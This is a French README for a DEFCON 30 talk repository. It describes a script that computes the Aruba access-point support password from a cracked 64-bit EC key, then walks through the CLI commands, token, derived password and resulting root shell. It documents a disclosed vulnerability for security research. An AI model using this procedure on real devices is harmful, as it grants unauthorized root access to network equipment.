
Matériel d'accompagnement pour la conférence « Hunting Bugs In The Tropics » du DEFCON 30
Ce dépôt contient les diapositives utilisées lors de ma présentation « Hunting Bugs in the Tropics » au DEFCON30. Il inclut le script Python utilisé pour calculer le mot de passe de support à partir de la clé privée obtenue en cassant la clé publique EC du support Aruba, en raison de sa taille faible (64 bits). Cela vous permet de sortir du sous-shell sur ces appareils et d'obtenir un shell root complet.
Vous pouvez l'utiliser en exécutant support sur la CLI de l'AP et en fournissant un nom d'utilisateur arbitraire :
# support
Username (Please enter with @domain.com, in lowercase): a
Token: ED14-B132-D4BB-D428
Please generate one time password at https://ase.arubanetworks.com/decode_aos_key
Support Password:
puis en transmettant le nom d'utilisateur et la valeur du Token au script support-access.py de ce dépôt.
$ ./support-access.py a ED14-B132-D4BB-D428
Password: 4197d68283f73d5c
Collez la réponse comme mot de passe de support :
Support Password: 4197d68283f73d5c
Switching to Full Access
~ # whoami
root